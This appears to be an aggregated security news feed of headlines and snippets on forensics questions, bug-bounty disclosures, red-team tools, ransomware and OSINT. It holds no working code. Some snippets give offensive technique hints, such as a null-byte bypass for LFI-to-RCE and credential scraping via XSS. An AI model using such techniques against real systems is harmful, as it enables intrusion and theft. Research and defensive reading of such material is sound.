    SKALE Network disclosed a bug submitted by voiddy: https://hackerone.com/reports/1546935 - Bounty: $2500
  • Open

    Laptop HP Forensic Image
    Hello, I wanted to see if anyone could help me out. I have an old laptop that I want to mess with, so I can learn how to create an image of it. How can I extract an image from my HP laptop, what forensic tools can I use? Any YouTube videos or websites that show a step by step how to do this? Thanks in advance! submitted by /u/Sudden_Ad9859 [link] [comments]
    Odd FTK Imager behavior
    Got a micro SD card from dash cam to analyze. In Windows Explorer, via write blocker, the card looks formatted by Android with typical folders you would see if used in a phone. In FTK Imager, I see the folders and subfolders for the dash cam. Found hundreds of videos. A month later, I open FTK Imager, same version, and view the card again, only this time I only get the Android data. I cannot locate the dash cam folders or videos. I have rolled back to earlier versions of FTK Imager and tried Windows 11, 10, and 7. Has anyone ever experienced something like this before or possibly have any recommendations for next steps to try. Thanks in advance. submitted by /u/rgc_71 [link] [comments]
    Evtx Rules
    Hello everyone, Hope you all had a great holiday. I have the following situation pulled from an .EVTX log, and I am wondering if there is a log or file that tells me what "specific words" rule was deleted please. "Microsoft Outlook Delete rule "Delete messages with specific words"? submitted by /u/clarkwgriswoldjr [link] [comments]
    A DIY Windows forensics challenge
    Hi all, I thought this is helpful for anyone wanting to get their hands on a Windows system with realistic attack patterns to perform a forensic analysis on it. I've published a Github repo that includes a script, based on AtomicRedTeam, which will run a few selected atomic techniques that are great for beginner and medium experienced analysts to practice forensics. You can completely run it on your own lab / Windows system (e.g. trial version). I published this as part of a course that is nowadays available on The Cyber Mentor Academy for cheap (full disclaimer!), however, there's no need for the course to get this going. It's a way to provide students with the opportunity to create their own forensic evidence and practice the full forensic process, which I wish was around when I started learning this. Practical windows forensics Github repo: https://github.com/bluecapesecurity/PWF Hope this is helpful for people! submitted by /u/masch_aut [link] [comments]
    iOS Synced Data Metadata/Artefacts:
    Let’s assume we are examining a file system extraction of an iPhone; is there a way to tell which data on the device was synced onto the device? e.g. if we narrowed down to iMessages would there be a database/PLIST file which contains that info? submitted by /u/1-bitbybit-0 [link] [comments]
  • Open

    Mostly Linux-related stuff but contains stuff like Samsung smart view and his cpuinfo output
    submitted by /u/themariocrafter [link] [comments]
  • Open

    how to find information disclosure bugs (:
    hello 👋 people of the internet so this is my frist writeup i hope i don’t suck that much. Continue reading on Medium »
    PII Disclosure of Apple Users ($10k)
    How I hacked Apple and was able to Disclose Apple Users Private Shipping Information and Mobile Numbers. Continue reading on Medium »
    Awesome Bug Bounty Tools
    Continue reading on Medium »
  • Open

    Koh: The Token Stealer
    Years ago I was chatting with a few experienced red teamers and one was lamenting token abuse. Specifically, they wanted to be able to… Continue reading on Posts By SpecterOps Team Members »
Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detection
    Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the… Continue reading on Medium »
  • Open

    War in Ukraine / July 6
    Britain without Johnson. What does this mean for Ukraine? Continue reading on Medium »
    “Mastering Cyber Intelligence” Notes
    Mastering Cyber Intelligence by Jean Nestor M. Dahj is the best cyber threat intel book I’ve read so far. It’s comprehensive and detailed… Continue reading on Medium »
    Tracking a Person Using OSINT
    Wondering how tech detectives track people using Open Source Intelligence and some Digital Forensics skills? Today I am gonna show a basic… Continue reading on Medium »
Some ways to enumerate what a target has
When exploiting, you need to know what the target has and how far its scope reaches, because we are attacking from the outside in; the… Continue reading on Medium »
  • Open

    Altiris Methods for Lateral Movement
    submitted by /u/dmchell [link] [comments]
  • Open

    Does anyone have any idea what this is?
    For the past 10 days or so, my friend has been receiving a lot of spam emails such as this one. Written in some sort of a code. Does anyone know how to decipher it? And what it is? https://cdn.discordapp.com/attachments/538420241794072579/994635097288491068/Screenshot_2022-07-07-18-04-38-23_45e686c594768066ad9911d54d96f72b.jpg submitted by /u/Kolur96 [link] [comments]
    how does omegle (p2p chat with randos) work without port forwarding?
    from my understanding two computers can't talk to each other without open ports on either of them if there is a way to make this work what's protecting me from becoming part of botnet by just visiting a website? submitted by /u/GreedyAd9811 [link] [comments]
    InsightVM Scans vs Agents
Personally I'm new to the InsightVM agents, not the authenticated scanning. The company I'm with chose to deploy the agents so they didn't have to use the privilege elevation in scanning, while still performing non-root-level scans. This was all implemented before I joined the company, but from what I've gathered they were told they didn't need to do elevated privilege scans because they use the agents. There are a lot of complaints of remediating something but InsightVM says it's still an issue and InsightVM sucks. Essentially they blame InsightVM as a poor product. Having used InsightVM for so many years, I still call it Nexpose, many of these vulnerabilities should be getting caught as remediated but aren't. So is there something wrong with our implementation or is it because we still need the elevated scans? The way I read the Rapid7 docs is that the agent doesn't replace the scans. Thanks submitted by /u/squirrel_butter [link] [comments]
  • Open

    SecWiki News 2022-07-07 Review
No news updated today yet~ For more of the latest articles, visit SecWiki
  • Open

    Advisory: FESTO: CECC-X-M1 - Command Injection Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Automating binary vulnerability discovery with Ghidra and Semgrep
    submitted by /u/0xdea [link] [comments]
  • Open

    Apache Commons Configuration insecure interpolation defaults (CVE-2022-33980)
    Article URL: https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s Comments URL: https://news.ycombinator.com/item?id=32014498 Points: 1 # Comments: 0
  • Open

    Scraping Login Credentials With XSS
    Unauthenticated JavaScript Fun In prior blog posts I’ve shown the types of weaponized XSS attacks one can perform against authenticated users, using their session to access and exfiltrate data, or perform actions in the application as that user. But what if you only have unauthenticated XSS? Perhaps your client hasn’t provided you with credentials to... The post Scraping Login Credentials With XSS appeared first on TrustedSec.
  • Open

FreeBuf Morning Report | China Honker Union announces dissolution and renaming; facial recognition flaws become a tool for scammers
The official Weibo account of the China Honker Union issued an announcement declaring its dissolution effective immediately and its renaming to the Hongke Union (弘客联盟).
User recognition | Tophant (斗象科技) selected for the 2022 cybersecurity "Dianping" Top 100 list
Anzai (安在) officially released the "2022 China Cybersecurity Product User Survey Report", and Tophant was successfully selected for the "Dianping" Top 100 list!
Why an API gateway is not enough to secure APIs: where does the road to API security lead?
According to Gartner's forecast, by 2023 more than 50% of B2B transactions will move away from traditional methods and be conducted through real-time APIs.
Upgraded to Rust, Hive ransomware's encryption becomes more complex
Recently, researchers at Microsoft's security division discovered an upgraded version of the Hive ransomware-as-a-service (RaaS), and security experts outlined their findings in a report on Tuesday. In the report, the experts stated the following: with several major upgrades in its latest version, Hive has proven to be one of the fastest-evolving ransomware families and exemplifies the constantly changing ransomware ecosystem. According to Microsoft, the upgrades in the latest version of Hive represent a complete overhaul of the entire ransomware infrastructure. In the report, the experts also pointed out that the most notable
FreeBuf Weekly | EU holds a very large-scale cybersecurity exercise; PCI DSS 4.0 released to address emerging threats and technologies
Happy weekend, FreeBufers~ We have summarized and recommended this week's hot news, quality articles and handy tools, so that nobody misses any of this week's highlights!
Marriott International data breached, 20GB of files stolen
The Marriott International hotel chain suffered a new data breach, with attackers stealing about 20GB of files from the company's network.
A simple attribution analysis of an ongoing email phishing campaign: who is doing the phishing?
Attribution analysis of an ongoing email phishing campaign
  • Open

    W Weekly #6: Bypassing 2FA, Steghide Challenges, PEStudio Walkthrough, and more…
    No content preview
    Annie From TryHackme
    No content preview

  • Open

    Privilege escalation possible in dovecot when similar passdbs are used
    Open-Xchange disclosed a bug submitted by julezman: https://hackerone.com/reports/1561579 - Bounty: $900
    Ownership check missing when updating or deleting attachments
    Nextcloud disclosed a bug submitted by kesselb: https://hackerone.com/reports/1579820
    Blind User-Agent SQL Injection to Blind Remote OS Command Execution at
    Sony disclosed a bug submitted by echidonut: https://hackerone.com/reports/1339430
  • Open

    7+3 Vulnerable Apps To Get Started With Android Penetration Testing
    There are currently 3.8 billion smartphone users in the world and this number is doomed to rise in the next years. Continue reading on Medium »
    Exposing Millions of Voter ID card user’s details.
    Critical IDOR disclosing millions of Voter ID card details of Individuals on the official voter ID maintaining platform. Continue reading on Medium »
    YOLO Smart Contracts are Coming to a Blockchain Near You
    Explainer and Community Bounty Continue reading on YOLOrekt »
    OTP Bypass through response manipulation.
    Hello Readers, I am Tariq Rafiq Kehar , a bug hunter. Continue reading on Medium »
    Synthetix Logic Error Bugfix Review
    Summary Continue reading on Immunefi »
    How I found Open redirect on Bug crowd public program in 2 day
    Tools : - Burp suite - Burp JS Link Finder Continue reading on Medium »
    How I Got my first bounty $$
    Hello hackers, Continue reading on Medium »
    Dorks Eye-Google Hacking Dork Scraping and Searching Script
    Dorks Eye is a Python 3-based script. You can easily find Google Dorks using this tool. Dork Eye collects potentially vulnerable web pages… Continue reading on Medium »
    Update your Chrome browser now to avoid a dangerous vulnerability
    Google has released a security update for the Chrome browser that fixes a zero-day vulnerability . This bug affects Windows, Mac and… Continue reading on Medium »
    SSRF web application vulnerability.
    What is an SSRF? Continue reading on Medium »
  • Open

    Shvanidzor access restriction: an open-source study
    It is early July 2022 and thus still the school holiday season in Armenia. There is little activity around noon in Shvanidzor. The village… Continue reading on Medium »
    OSINT
    OSINT Stands for Open-Source INTelligence Continue reading on Medium »
    War in Ukraine / July 5
    The next big battle is for Sloviansk Continue reading on Medium »
    Open Source Intelligence
    Open Source Intelligence (OSINT) is intelligence collected from publicly available resources. To take a real-life scenario let’s take that… Continue reading on Medium »
  • Open

OpenSSL remote code execution vulnerability (CVE-2022-2274)
OpenSSL version 3.0.4 introduced a serious problem in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This problem makes the RSA 2048-bit private key implementation incorrect on such machines, and during the computation...
  • Open

    Microsoft Sentinel Automation Tips & Tricks – Part 2: Playbooks
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-07-06 Review
RSAC2022 interpretation: AI security insights, advancing through confrontation by ourren; Designing your security architecture OKRs by ourren; Mimic defense technology explained (core technology part) by ourren; Mandiant cyber threat intelligence analyst core competencies framework by ourren; Tetragon -- eBPF-based security observability & runtime enforcement by ourren; Research on the development of integrated land, sea, air and space information networks by ourren; Satellite "hackers" explain "security flaws in satellite communications" by ourren; Cross-security-database entity relationship prediction based on graph attention networks by ourren; Exploiting leaked cloud host AK/SK by ourren; Cross-chain bridges: the battleground for Web3 hackers by ourren; The road to packet capture for WeChat mini programs by ourren; CS plugin: Taowu (梼杌), a red team automation framework based on the Cobalt Strike platform by ourren; cf: Cloud Exploitation Framework by ourren. For more of the latest articles, visit SecWiki
  • Open

    Linux Kernel Exploitation Techniques: modprobe_path
    submitted by /u/s4m4k [link] [comments]
  • Open

    made a mistake with my workflow. Should I be worried?
I made a huge security blunder over the last couple weeks... I was running a client-side HTML server that I could access on my localhost (127.0.0.1:5500/index.html) while developing a JavaScript program using VS Code. I was using the VS Code Live Server extension from here https://github.com/ritwickdey/vscode-live-server which exposes port 5500 on my localhost by default. I was doing this while using public wifi for many weeks! I didn't even realize that someone could nmap the LAN and find that my port 5500 was open and they could simply go to my live server directly with their browser. My webapp has a simple X/Y axis chart where I plot some API websocket data. No user input afaik. I used the latest Chrome to run the server and always keep my system updated. No SELinux though. Edited my main question: I'm just assuming the worst case scenario. If the attacker got to my live server, what kind of attacks can they perform on it? Because JavaScript is client-side/browser-based, can they extract any info out of my native system? Edit2: From my cursory research on this topic, the main form of attack from an attacker client is social engineering. For example inserting a malicious payload into a link and having me click on it to extract information from me. Other than that, exploiting any flaws inside the actual JavaScript itself would be like hacking themselves. The app I was testing was only front end, 100% browser based. No backend server involved at all. u/nuclear_splines' comment helped me understand it better. If I'm wrong feel free to correct me here. submitted by /u/Fuzzht1 [link] [comments]
    How does an attacker know they have gained access to an internal network?
I've always wanted to know, how does an attacker (launching an attack from the Internet) know when they have breached a network's defenses and gained access to a private / internal network? Would it be as simple as having a GUI or remote desktop configuration and seeing the desktop or GUI of some device on the internal network? Or would an attacker conduct a network / port scan to verify that they're seeing all private IP addresses and use that as evidence that they're on the inside? submitted by /u/Anontrovert [link] [comments]
    Vulnerability Alerting using software inventory
    I'm looking for services that aggregate vendor security alerts, notifications, advisories, etc. Preferably matching alerts with software inventories using a CMDB. If in any way possible (manual) government feeds would be great as well. Anyone familiar with services like these, focused on enterprises? submitted by /u/overworst [link] [comments]
    Has anyone here created an ISAC?
    Has anyone here created an ISAC for their industry / geographical region or whatever? Any tips for someone looking to start one? What model did you use? Did you charge a fee? How did you get people involved? submitted by /u/UnderstandingInfosec [link] [comments]
    Briefly connected to hotel wifi to download a game from Steam and a discord call, should I be worried?
    So I'm currently on vacation and have some down time at our hotel so I decided to try and play some games. I do not have a VPN (I know it's recommended in general but I never wanted to pay for a service and I am a little paranoid of the free ones). I actively wanted to avoid the hotel wifi so I downloaded some games onto my laptop at home on Steam but didn't do the first time startup which would not work without the internet. So I finished doing that and also decided to download another game and then disconnect from the wifi. Again later I was on my phone on a discord call with some friends and thought maybe I should try the wifi to see if the connection is better as I was thinking to myself that I was over paranoid. Well here I am now starting to stress out about it, am I at any risk of important information being stolen? As I said all I did was connect to wifi on my phone for around a minute while on a discord call, and then download stuff from Steam over an hour or so. The hotel wifi is password protected but I do not believe it has wpa2 (not very familiar with network stuff) or anything like that. submitted by /u/mrahma [link] [comments]
    Very long uninstall
    I recently installed an app on my Windows 10 machine that is very graphics intensive. I took a look at it and decided to uninstall. The installer reported an estimated 30 minutes to uninstall the software which made me suspect it was doing something more than uninstalling. I contacted the developer who was very responsive and told me that this was normal. I went ahead with the uninstall which ended up taking over 20 minutes but I also fired up Wireshark and captured a PCAP file during the process. I'm a complete n00b at this point and was wondering if someone might be willing to look at the file for anything nefarious. I'm also curious if there is a legitimate reason that the uninstall should take that long. submitted by /u/Danno_ST [link] [comments]
    How does an IP address get spoofed?
    Is it possible to mask an ip address with another. If so, how? submitted by /u/iExtrapolate314 [link] [comments]
  • Open

    Optimizing CI/CD Credential Hygiene – A Comparison of CI/CD Solutions
    submitted by /u/TupleType1 [link] [comments]
  • Open

    Continuous testing, continuous security
    A talk with our Red Team lead, Gabriel Franco Continue reading on Faraday »
    HACKER DOUBLE SUMMER 2022 GUIDES —Part Two: Capture The Flags
    Welcome to the DCG 201 guide to Hacker Double Summer! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »
  • Open

[Benefits inside] 1-day countdown! The CIS Conference Summer Edition is about to set sail
See you on the official CIS Conference Summer Edition website at 9 a.m. on July 8!
FreeBuf Morning Report | NPM supply chain attack affects hundreds of websites; British Army social media accounts hijacked
British Army social media accounts were hijacked.
Insight: Reflections on data governance and data security governance
Data governance is the full set of management activities in an organization concerning the use of data, including the planning, monitoring and implementation of data governance.
Compromising hundreds of websites and applications: the impact of the NPM supply chain attack is incalculable
Recently, an NPM supply chain attack compromised hundreds of applications and websites.
New RedAlert ransomware strikes! Windows and Linux servers already hit
A new ransomware named RedAlert is attacking enterprise networks; Windows and Linux VMware ESXi systems have already been hit.
Hands-on: KMDF-based disk write protection
This article briefly explains how to implement a KMDF-based disk write protection feature.
  • Open

    I took the SANS GCFE exam and this wall of text is what happened next
    Who/What/Where/When: 2 weeks yore, I passed the GCFE exam with a score of 91%. I'm a Security Engineer with a (now) 8-pack of certs. This was my 2nd SANS cert after GCIH. I took the exam remotely proctored and found the experience to be much smoother than my experience in the year of 2020 yore. How / 9 Observations: The course handouts were my dear friends during my 3-hours of need. Give them a thorough review before the test and bring those you might find useful with you to the exam. I made a target timetable (tinyurl.com/yckv9jy8) which helped me to keep track of my exam pacing. Had I not had this, I would have inevitably wasted precious neuron cycles calculating my remaining time. This helped to keep me focused and strategize when to spend extra time on questions. I took a more b…
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

.NET deserialization vulnerabilities: bypassing insecure SerializationBinder type binding
Author: 且听安全 Original link: https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA Overview: When fixing deserialization vulnerabilities in BinaryFormatter, SoapFormatter, LosFormatter, NetDataContractSerializer, ObjectStateFormatter and the like, many .NET applications like to use a custom Se...
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    Article URL: https://blog.assetnote.io/2022/06/26/exploiting-ssrf-in-jira/ Comments URL: https://news.ycombinator.com/item?id=31995638 Points: 1 # Comments: 0

  • Open

    Microscopes and Optics in General
    submitted by /u/mrcanard [link] [comments]
    pictures of landmines.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of illegally dumped rubbish in Bayview, California.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    All fortnite models with the .blend extension (google drive)
    Chapter 1 models: https://drive.google.com/drive/folders/13XwAQX770Rkb5Qx-XFKYjlyn130OOGjj Chapter 2 models: https://drive.google.com/drive/folders/1L2wa9TMRwdbRjK_FgnX-u2KvBPxDxR_z ​ (credits are in the 'please read' doc) submitted by /u/ethansean0607 [link] [comments]
    Indiana Military history
    http://indianamilitary.org/ATTERBURYAAF/ http://indianamilitary.org/Bakalar%20AFB/ http://indianamilitary.org/Camp%20Atterbury/ http://indianamilitary.org/FtHarrison/ http://indianamilitary.org/WakemanHospital/ http://indianamilitary.org/28TH/ http://indianamilitary.org/30TH/ http://indianamilitary.org/31STINFDIV/ http://indianamilitary.org/83RD/ http://indianamilitary.org/92nd/ http://indianamilitary.org/106ID/ http://indianamilitary.org/CA%20POWs/ http://indianamilitary.org/German%20PW%20Camps/ http://indianamilitary.org/CoD151Ranger/ http://indianamilitary.org/Misc/ http://indianamilitary.org/YANK/ http://indianamilitary.org/StarsStripes/ http://indianamilitary.org/ROSTERs/ ​ Some army manuals, unit history books, and Army published newspapers and magazines. Mostly WW2 material from what I could tell. submitted by /u/c-rn [link] [comments]
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    submitted by /u/Mempodipper [link] [comments]
    From NtObjectManager to PetitPotam
    submitted by /u/onlinereadme [link] [comments]
  • Open

    Re-architecture of lab environment: workstations vs. server?
    Hey guys, currently I'm tasked to create a draft for our new forensics lab. We use one workstation per case/analyst in our current setup (5 in total). All of them have a fairly big RAID. Our current workloads are mainly analysing triage packages, full images and logs. Once half a year we get a small eDiscovery from our internal compliance department with ~10 GB/case. All of them are from ~2016 with 20 physical cores, 128 GB RAM and two RAIDs for evidence files and case files. Both of them are ~12 TB net. I want to build a "modern lab environment". Goals I try to achieve after the re-architecture: * Hassle-free usage of evidence/images for multiple analysts * A good working environment with less noise pollution * Maintain high performance for CPU-intensive tasks (e. g. Nuix Workstation…
    Recover Bitlocker Drive that has been formatted
    Is it possible to recover data from a "bitlocked" drive that has been formatted with a new windows install? In my mind, even if you could recover the data from the slackspace it would all be garbage unless you run the decryption function on it which I don't think is possible unless you're able to reconstruct enough of the drive to be able to decrypt it with the recovery key. submitted by /u/Tight_Candidate_2293 [link] [comments]
    Google Photo Cache?
    Hello everyone! With Magnet Axiom I find an image inside "com.google.android.apps.photos\cache\glide_cache" at 23:50. What does this mean? That the image was displayed at that time, or was it generated by the system? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Bellatrix( VulHub)
    Hello and welcome. I wanted to get a writeup out there on my favorite series and talk of the year , “Harry Potter and the Road to OSCP” ok… Continue reading on Medium »
  • Open

    How easy is it to create a burner laptop?
    I'm a joe schmoe with little info sec knowledge. How feasible would it be for me to purchase a cheap laptop/chromebook and set it up in a way that my web surfing habits wouldn't be able to be tracked back to me specifically? My personal/work machines are both plugged in to all of my personal accounts already. Would it be enough to just buy a laptop and keep my personal accounts off of it, or would i have to set up a VPN for it/jump through any other hoops? I don't work in a field with sensitive data or anything like that, so it wouldn't have to be locked up airtight. I'm mostly just interested in shrinking my digital footprint and protecting my privacy. Apologies if I'm in the wrong place - just steer me in the right direction if that's the case. Thanks - submitted by /u/Lt_AldoRaine_ [link] [comments]
    Hardening [unsecure] 2-layer Architecture Applications
Hello /r/AskNetsec. Working in Application Security at a company with a landscape abundant in legacy software, sometimes we come across situations where we are tasked with proposing security requirements and architectural security improvements to applications that are insecure by default due to their 2-layer architecture. Example: A thick-client application running on users' workstations or VDI that communicates directly with the database instead of having a back-end logic server in between. In these cases, we find it hard to propose meaningful security improvements because the design is flawed by default; however, business requirements often don't allow us to demand a full architecture refactor or replacing the solution. For these cases, which other areas of improvement would you propose in terms of security requirements, architectural tweaks, etc., so we can have something to show for it and improve the security as much as we can given the constraints in place. Thanks! submitted by /u/FabioFreitas [link] [comments]
  • Open

    SSRF via Office file thumbnails
    Slack disclosed a bug submitted by ziot: https://hackerone.com/reports/671935 - Bounty: $4000
    Exposure of a valid Gitlab-Workhorse JWT leading to various bad things
    GitLab disclosed a bug submitted by ledz1996: https://hackerone.com/reports/1040786 - Bounty: $10000
    Reflected Cross site Scripting (XSS) on https://one.newrelic.com
    New Relic disclosed a bug submitted by sairanga: https://hackerone.com/reports/1367642 - Bounty: $2048
    Reflected XSS on https://wwwapps.ups.com/ctc/request?loc=
    UPS VDP disclosed a bug submitted by 3amoura: https://hackerone.com/reports/1536461
  • Open

    War in Ukraine / July 4
    Russia continues its offensive in Donbas Continue reading on Medium »
    How to use Creepy Tool for Beginner
    All we have to do is choose the platform-appropriate version and install it. After installing Creepy, the next step is to configure the… Continue reading on Medium »
    Thoughts from an OSINT Newbie…
    For the past few weeks, I have been interested in changing careers to work as an OSINT Investigator. Continue reading on Medium »
    Brand Intelligence: How to use OSINT in an organization
    Hello cybersecurity folks, I know you are skilled at defending your network and other infrastructures from cyber attacks. Yeah, I know you… Continue reading on Medium »
    Top 7 Free Open Source Intelligence Hacking Tools For Beginners
    Open Source Intelligence (OSINT) Continue reading on Medium »
Collecting information on students, faculty, staff and contractors of UFRN
Hi everyone, it's been a long time since I wrote an information security article on Medium (I was waiting for something cool… Continue reading on Medium »
  • Open

    How To Use Foundry To PoC Bug Leads, Part 1
    You’ve probably heard about all of the epic disclosures in the Web3 bug bounty space recently and decided that maybe it’s time to pave… Continue reading on Immunefi »
    Get Rich by Finding Bugs
    These websites will pay you for it Continue reading on Level Up Coding »
    rDEX V2 is Deployed on StaFiHub Testnet with The Bug Bounty Program.
    Continue reading on Medium »
    How I find open redirect in Facebook
    Hi Guys Continue reading on Medium »
    rDEX V2 is Deployed on the StaFiHub Testnet with The Bug Bounty Program
    Overview Continue reading on StaFi »
    How To Get Start Into Bug Bounty By Kidnapshadow
    Hello everyone, After a lot of requests and questions on topics related to Bug Bounty like how to start, how to beat duplicates, what to… Continue reading on Medium »
    XSScope-GUI Framework for XSS Clientside attacks
    The most cutting-edge GUI Framework for XSS Client-side attacks is called XSScope. It is capable of real-time HTML injections and various… Continue reading on Medium »
    LFI TO RCE(PHP WRAPPERS)
In the following target, we see that the application will always append a .php; now we will have to circumvent this using the code %00 (null byte) Continue reading on Medium »
  • Open

    SecWiki News 2022-07-05 Review
Similarity measures and classification of graph structures by ourren; SecWiki Weekly (Issue 435) by ourren; Analysis report on the activities of overseas NGOs in China (2017-2021) by ourren; US cyber development trends seen from the FY2023 budget by ourren; Cyberspace mapping -- just another form of Google by ourren. For more of the latest articles, visit SecWiki
  • Open

    A Diamond in the Ruff
    This blog post was co-authored with Charlie Clark at Semperis 1.1      Background of the ‘Diamond’ Attack One day, while browsing YouTube, we came across an older presentation from Blackhat 2015 by Tal Be’ery and Michael Cherny. In their talk, and subsequent brief, WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING, they outlined something we... The post A Diamond in the Ruff appeared first on TrustedSec.
  • Open

    When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors
    Penetration testing and adversary emulation tool Brute Ratel C4 is effective at defeating modern detection capabilities – and malicious actors have begun to adopt it. The post When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors appeared first on Unit 42.
  • Open

    Linear-Time Temporal Logic Guided Greybox Fuzzing
    Article URL: https://github.com/ltlfuzzer/LTL-Fuzzer Comments URL: https://news.ycombinator.com/item?id=31987389 Points: 1 # Comments: 0
  • Open

    Free webinar on threat hunting with Sigma rules
    submitted by /u/alertnoalert [link] [comments]
  • Open

FreeBuf Morning Report | NATO to develop rapid cyber response capability; PCI DSS 4.0 released to address emerging threats and technologies
Global developments 1. IDC: China's cloud workload security market reached US$280 million in 2021. In July 2022 IDC officially released its market share research report on China's cloud workload security products, "China Cloud Workload Security Market Share, 2021: Cloud Native and Shift-Left Security Drive Continued Technological Innovation". The Chinese market saw explosive growth in both size and growth rate in 2021, with the market reaching US$280 million, up 57.9% year-on-year from 2020. [Read original] 2. The World Wide Web Consortium rejects Google and Mozilla over Decentralized Identifiers (
Mindset adjustment for cyber attack-defense exercises | FreeBuf enterprise-side community livestream recap
Preparation before a cyber attack-defense exercise, in addition to asset inventory, controlling secure access and defense in depth, also requires getting into the right frame of mind and facing the exercise with a positive attitude.
Serious Chrome zero-day disclosed; Google urges users to update as soon as possible
Google announced that it has released the Chrome 103.0.5060.114 update for Windows users.
CISA orders US federal agencies to patch CVE-2022-26925 by July 22
The US Cybersecurity and Infrastructure Security Agency has again added CVE-2022-26925 to its known vulnerabilities catalog and ordered federal civilian executive branch agencies to remediate it by July 22.
UK signs agreement to share biometric database with US border guards
The US side, based on the International Biometric Information Sharing program (IBIS) and with the support of the Enhanced Border Security Partnership (EBSP), has demanded the introduction of new visa requirements.
[Livestream booking] Dual livestream rooms enabled for the first time | CIS Conference Summer Edition in 5 days
"CIS Conference Summer Edition · Summer Live" is coming soon!
  • Open

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much
  • Open

I Let What I Couldn't Write Loose into the Marmara, or the Shoelace in İznik
If you have started reading this despite such an absurd title, you have a problem with yourself. Continue reading on Medium »

  • Open

    Is there any way that payments can be handled in a secure way on an HTTP webpage?
    [SOLVED] I am supposed to pay for a transcript and the website wants me to enter payment in an http page with an embedded payment platform. The payment platform appears to use asp, but the webpage it is embedded in is plain html. If I click on the box for the credit card, firefox pops up a message saying that it is not an encrypted webpage and warns me about security. Obviously this sets off multiple red flags telling me that I shouldn't trust that website, but it is an official website (albeit hosted in Korea where apparently security is lax). Is there any chance that this was implemented in a secure way? How could I test it? ​ EDIT: Per the recommendation, I ran a transaction with a bogus number to try and capture the behaviour in wireshark; what I found was that initiating the transaction creates a connection on port 443 and the data seems to be sent there, so I guess it's secure? But I still don't quite trust it so I'll probably be mailing stuff. PS: I cannot share a link because my supervisor works with the people who run the site and they wouldn't want me to send a link. I'm not sure the page is even listed so they might be going for a security through obscurity thing. submitted by /u/LubbyLardo [link] [comments]
  • Open

    Crack the hash Level 2 Write-up (Free Room on TryHackMe) Cracking Salted Hashes
    Introduction Continue reading on Medium »
    What is Burp Suite
    Put simply: Burp Suite is a framework written in Java that aims to provide a one-stop-shop for web application penetration testing. Continue reading on Medium »
    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
MSA Weekly 2 — How to Install a Virtual Machine and the Nginx Web Server
With the advances of the times you can use many different OSes on just one computer. That way you can create… Continue reading on Medium »
MSA Weekly 2 — “Tutorial: Installing Nginx on Kali Linux”
Hi hi, on this occasion we will try to learn how to install Nginx on Kali Linux. Now, for those of you who have never… Continue reading on Medium »
    HackTools-The complete Red Team add-on for Web Pentester
    HackTools is a web addon that makes it easier to perform online application penetration testing. It comes with cheat sheets and all the… Continue reading on Medium »
    Continuous Security Project [TR]
    Herkese merhaba, bu yazımda Continuos Security için geliştiriğimiz projeden bahsediyor olacağım. Continue reading on Medium »
    XSS Explained
    Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. Continue reading on Medium »
    My first ever Bug Bounty reward!
    Hello guys! Vishnu here. I am back again with yet another interesting article. Well technically, this is not the first bug I discovered,... Continue reading on Medium »
  • Open

    From Misconfigured Certificate Template to Windows Domain Admin
    submitted by /u/Kondencuotaspienas

    War in Ukraine / July 1–3
    👉 Days of EU Integration in Ukraine’s Parliament Continue reading on Medium »

    SecWiki News 2022-07-04 Review
    No news updated today. For more of the latest articles, visit SecWiki

    CVE-2022-32511 | Exploit | Remote Code Execution
    No content preview

    SMTP Command Injection in iCalendar Attachments to Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1516377 - Bounty: $250
    Moderators can send messages to users from banned subreddits via `oauth.reddit.com/api/mod/conversations`
    Reddit disclosed a bug submitted by zqyzoid: https://hackerone.com/reports/1543770 - Bounty: $100

    Is it feasible to image a 12 TB storage server? What is the best storage solution for the image? Which imaging software? (Solaris OS)
    Live imaging. Should I do a dd? submitted by /u/MasterBet

    Vulnerability Capstone | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/vulnerabilitycapstone Continue reading on Medium »
    TryHackMe | Red Team Fundamentals
    Learn about the basics of a red engagement, the main components and stakeholders involved. Continue reading on Medium »
    eJPT in My Point of View
    I am writing a post after about a year since I have been busy with studies and work. Nowadays a lot is going on in our country and people… Continue reading on Medium »

    FreeBuf Morning Report | The EU holds an extremely large-scale cybersecurity exercise; malware disrupted several US state unemployment websites
    According to the latest technology trends report released by CompTIA, cybersecurity ranks first among the ten highest-paying in-demand skills of 2022.
    [Watch the livestream for gifts] Virtual host FreeBee makes her first appearance at the CIS Conference Summer Edition
    The “CIS Conference Summer Live” is here! Lots of activities and lots of perks are waiting for you!
    HackerOne employee sold vulnerability reports for profit
    According to HackerOne, the employee contacted seven HackerOne customers and collected bounties in a small number of disclosures.
    TikTok assures US lawmakers it is working to protect user data from its Chinese employees
    TikTok is trying to reassure US lawmakers, saying it is taking steps to strengthen data security protection.
    Verified accounts hacked: threat actors use celebrity Twitter accounts to send phishing messages
    Recently, threat actors have been compromising verified Twitter accounts.
    Five years of dramatic change in cybersecurity at a glance
